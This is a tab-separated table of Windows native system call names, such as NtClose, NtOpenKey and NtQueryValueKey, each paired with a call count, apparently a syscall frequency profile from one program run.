NtQueryObject(>)	1	NtCreateIoCompletion(>)	3	NtQueryVolumeInformationFile(>)	11	NtWaitForSingleObject(>)	74
NtQueryTimerResolution(>)	1	NtDeleteValueKey(>)	3	NtUserSystemParametersInfo(>)	11	NtQueryVirtualMemory(>)	75
NtReplyWaitReceivePortEx(>)	1	NtDuplicateToken(>)	3	NtOpenEvent(>)	12	NtOpenSection(>)	77
NtSecureConnectPort(>)	1	NtQuerySecurityObject(>)	3	NtGdiSelectBitmap(>)	13	NtReadFile(>)	88
NtSetIoCompletion(>)	1	NtReadVirtualMemory(>)	3	NtOpenProcessToken(>)	13	NtMapViewOfSection(>)	101
NtSetTimer(>)	1	NtUserGetDC(>)	3	NtWriteFile(>)	13	NtEnumerateValueKey(>)	108
NtUserGetAtomName(>)	1	NtAddAtom(>)	4	NtEnumerateKey(>)	14	NtOpenProcessTokenEx(>)	117
NtUserGetClassName(>)	1	NtGdiCreateCompatibleDC(>)	4	NtQueryDefaultUILanguage(>)	14	NtOpenThreadTokenEx(>)	117
NtUserGetGUIThreadInfo(>)	1	NtSetEventBoostPriority(>)	4	NtUserCallOneParam(>)	15	NtQuerySystemInformation(>)	126
NtUserSetCursorIconData(>)	1	NtUserCreateWindowEx(>)	4	NtNotifyChangeKey(>)	20	NtProtectVirtualMemory(>)	127
NtUserSetWindowLong(>)	1	NtUserGetObjectInformation(>)	4	NtCreateSemaphore(>)	22	NtQueryKey(>)	130
NtAccessCheck(>)	2	NtUserMessageCall(>)	4	NtUserRegisterWindowMessage(>)	23	NtQueryInformationToken(>)	138
NtCallbackReturn(>)	2	NtUserSelectPalette(>)	4	NtOpenThreadToken(>)	27	NtOpenFile(>)	147
NtGdiCreateBitmap(>)	2	NtWriteVirtualMemory(>)	4	NtFsControlFile(>)	30	NtAllocateVirtualMemory(>)	151
NtGdiCreateSolidBrush(>)	2	NtClearEvent(>)	5	NtQueryInformationFile(>)	33	NtQueryAttributesFile(>)	197
NtGdiDeleteObjectApp(>)	2	NtConnectPort(>)	5	NtCreateFile(>)	34	NtQueryValueKey(>)	491
NtGdiGetDCObject(>)	2	NtCreateMutant(>)	5	NtDeviceIoControlFile(>)	35	NtOpenKey(>)	560
NtGdiGetDCforBitmap(>)	2	NtGdiGetStockObject(>)	5	NtQuerySection(>)	36	NtClose(>)	700
NtGdiHfontCreate(>)	2	NtOpenProcess(>)	5	NtReleaseMutant(>)	36
NtGdiRestoreDC(>)	2	NtQueryInformationThread(>)	5